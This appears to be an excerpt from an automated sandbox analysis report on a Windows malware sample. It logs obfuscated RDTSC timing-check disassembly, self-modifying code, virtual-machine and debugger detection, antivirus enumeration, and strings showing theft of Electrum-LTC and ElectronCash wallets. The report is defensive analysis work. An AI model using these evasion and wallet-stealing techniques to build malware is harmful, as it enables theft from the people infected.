              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915D71 second address: 915D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915D7B second address: 915D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915D7F second address: 915D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91761D second address: 917621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703A9 second address: 4D703AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703AD second address: 4D703B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703B3 second address: 4D703EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D507EA978h 0x00000008 mov ax, 3B61h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3D507EA973h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703EB second address: 4D703F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703F1 second address: 4D703F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703F5 second address: 4D7041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D50D0EC74h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7041D second address: 4D70423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70423 second address: 4D70442 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, 12BE07CEh 0x00000014 mov dl, D2h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA041E second address: 4DA045B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 6182h 0x00000007 pushfd 0x00000008 jmp 00007F3D507EA973h 0x0000000d jmp 00007F3D507EA973h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx edi, si 0x0000001d mov dx, cx 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA045B second address: 4DA04D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F3D50D0EC75h 0x00000015 mov ebp, esp 0x00000017 jmp 00007F3D50D0EC6Eh 0x0000001c xchg eax, ecx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F3D50D0EC6Eh 0x00000024 sbb cl, 00000068h 0x00000027 jmp 00007F3D50D0EC6Bh 0x0000002c popfd 0x0000002d mov esi, 0E90ED5Fh 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04D0 second address: 4DA04F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3D507EA96Ch 0x0000000a and esi, 76E91DC8h 0x00000010 jmp 00007F3D507EA96Bh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04F4 second address: 4DA0539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b jmp 00007F3D50D0EC6Ch 0x00000010 jmp 00007F3D50D0EC72h 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0539 second address: 4DA0556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA979h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0556 second address: 4DA059E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3D50D0EC71h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F3D50D0EC6Ah 0x00000019 xor ecx, 2B1D1278h 0x0000001f jmp 00007F3D50D0EC6Bh 0x00000024 popfd 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA059E second address: 4DA05F9 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 65AFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F3D507EA974h 0x0000000d pushfd 0x0000000e jmp 00007F3D507EA972h 0x00000013 add ecx, 2D577C08h 0x00000019 jmp 00007F3D507EA96Bh 0x0000001e popfd 0x0000001f pop ecx 0x00000020 popad 0x00000021 lea eax, dword ptr [ebp-04h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F3D507EA971h 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA05F9 second address: 4DA05FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA05FF second address: 4DA0616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D507EA973h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0616 second address: 4DA0679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F3D50D0EC6Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ecx, 5F9B1AC3h 0x0000001a pushfd 0x0000001b jmp 00007F3D50D0EC78h 0x00000020 add eax, 1BE42588h 0x00000026 jmp 00007F3D50D0EC6Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0679 second address: 4DA06C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA979h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F3D507EA96Eh 0x0000000f push dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3D507EA977h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0700 second address: 4DA0704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0704 second address: 4DA070A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA070A second address: 4DA0739 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3D50D0EC77h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0739 second address: 4DA0767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA979h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3D507EA96Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0767 second address: 4DA076D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA076D second address: 4DA07A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA973h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F3D507EA9CDh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3D507EA970h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA07A0 second address: 4DA07AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA07AF second address: 4DA07C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D507EA974h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0807 second address: 4DA081F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D50D0EC74h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA081F second address: 4D90007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007F3D507EA976h 0x00000011 retn 0004h 0x00000014 nop 0x00000015 cmp eax, 00000000h 0x00000018 setne al 0x0000001b xor ebx, ebx 0x0000001d test al, 01h 0x0000001f jne 00007F3D507EA967h 0x00000021 xor eax, eax 0x00000023 sub esp, 08h 0x00000026 mov dword ptr [esp], 00000000h 0x0000002d mov dword ptr [esp+04h], 00000000h 0x00000035 call 00007F3D54F43DA3h 0x0000003a mov edi, edi 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90007 second address: 4D9003B instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov edx, ecx 0x00000010 pushad 0x00000011 mov dl, ah 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F3D50D0EC78h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9003B second address: 4D9004A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9004A second address: 4D9005F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 741A0CCAh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, bx 0x00000012 mov eax, ebx 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9005F second address: 4D90070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D507EA96Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90070 second address: 4D900AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F3D50D0EC73h 0x00000011 pop ecx 0x00000012 jmp 00007F3D50D0EC79h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902AA second address: 4D902BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D507EA96Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902BC second address: 4D90360 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d call 00007F3D50D0EC74h 0x00000012 pushfd 0x00000013 jmp 00007F3D50D0EC72h 0x00000018 and si, C418h 0x0000001d jmp 00007F3D50D0EC6Bh 0x00000022 popfd 0x00000023 pop eax 0x00000024 push edi 0x00000025 mov eax, 7D3AE9EBh 0x0000002a pop esi 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov cl, ABh 0x00000030 pushfd 0x00000031 jmp 00007F3D50D0EC79h 0x00000036 or ecx, 7E6E9866h 0x0000003c jmp 00007F3D50D0EC71h 0x00000041 popfd 0x00000042 popad 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 jmp 00007F3D50D0EC73h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90360 second address: 4D90365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90365 second address: 4D9037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D50D0EC72h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9037B second address: 4D9037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9037F second address: 4D903E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F3D50D0EC6Ch 0x0000000e mov dword ptr [esp], edi 0x00000011 jmp 00007F3D50D0EC70h 0x00000016 mov eax, dword ptr [75AF4538h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F3D50D0EC6Dh 0x00000024 jmp 00007F3D50D0EC6Bh 0x00000029 popfd 0x0000002a call 00007F3D50D0EC78h 0x0000002f pop eax 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D903E3 second address: 4D903E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D903E9 second address: 4D90413 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [ebp-08h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F3D50D0EC6Dh 0x00000016 pop esi 0x00000017 mov edx, 40414C64h 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90413 second address: 4D9047C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 4Ch 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, ebp 0x0000000d jmp 00007F3D507EA96Ch 0x00000012 nop 0x00000013 jmp 00007F3D507EA970h 0x00000018 push eax 0x00000019 jmp 00007F3D507EA96Bh 0x0000001e nop 0x0000001f jmp 00007F3D507EA976h 0x00000024 lea eax, dword ptr [ebp-10h] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F3D507EA977h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9047C second address: 4D90521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F3D50D0EC70h 0x0000000c add eax, 14A82638h 0x00000012 jmp 00007F3D50D0EC6Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr fs:[00000000h], eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F3D50D0EC74h 0x00000028 add esi, 35F32098h 0x0000002e jmp 00007F3D50D0EC6Bh 0x00000033 popfd 0x00000034 popad 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 pushad 0x00000039 pushad 0x0000003a push ebx 0x0000003b pop esi 0x0000003c pushad 0x0000003d popad 0x0000003e popad 0x0000003f mov ax, dx 0x00000042 popad 0x00000043 mov eax, dword ptr fs:[00000018h] 0x00000049 jmp 00007F3D50D0EC75h 0x0000004e mov ecx, dword ptr [eax+00000FDCh] 0x00000054 pushad 0x00000055 mov esi, 1416C5C3h 0x0000005a mov edx, ecx 0x0000005c popad 0x0000005d test ecx, ecx 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F3D50D0EC6Ch 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90521 second address: 4D90527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90527 second address: 4D90577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 352261A3h 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jns 00007F3D50D0ECC2h 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F3D50D0EC70h 0x0000001a add cx, F6E8h 0x0000001f jmp 00007F3D50D0EC6Bh 0x00000024 popfd 0x00000025 pushad 0x00000026 call 00007F3D50D0EC76h 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90577 second address: 4D9059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add eax, ecx 0x00000008 jmp 00007F3D507EA977h 0x0000000d mov ecx, dword ptr [ebp+08h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9059F second address: 4D905BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D905BA second address: 4D905C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D905C0 second address: 4D905D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3D50D0EC6Ah 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D905D6 second address: 4D905DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D905DC second address: 4D905E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D905E0 second address: 4D905E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D802DD second address: 4D802F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D802F8 second address: 4D8033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 53h 0x00000005 pushfd 0x00000006 jmp 00007F3D507EA970h 0x0000000b or ecx, 302012B8h 0x00000011 jmp 00007F3D507EA96Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3D507EA975h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8033B second address: 4D80374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3D50D0EC71h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 movzx esi, di 0x00000014 push edi 0x00000015 mov cl, 86h 0x00000017 pop ebx 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80374 second address: 4D80378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 81878D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 65E8D7 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 826BA9 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe TID: 3948 Thread sleep time: -150000s >= -30000s
              Source: C:\Users\user\Desktop\file.exe TID: 4268 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, file.exe, 00000000.00000003.2155758852.0000000001031000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156940751.0000000001031000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156730025.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: file.exe Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe File opened: NTICE
              Source: C:\Users\user\Desktop\file.exe File opened: SICE
              Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00640F10 LdrInitializeThunk,0_2_00640F10

              HIPS / PFW / Operating System Protection Evasion

              Source: file.exe, 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: file.exe, 00000000.00000003.2114154432.00000000010A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155414603.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114026458.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2150400482.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124998793.00000000010A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: file.exe PID: 6648, type: MEMORYSTR
              Source: Yara match; File source: sslproxydump.pcap, type: PCAP
              Source: file.exe; String found in binary or memory: Wallets/Electrum-LTC
              Source: file.exe, 00000000.00000003.2086942025.00000000010B1000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Wallets/ElectronCash
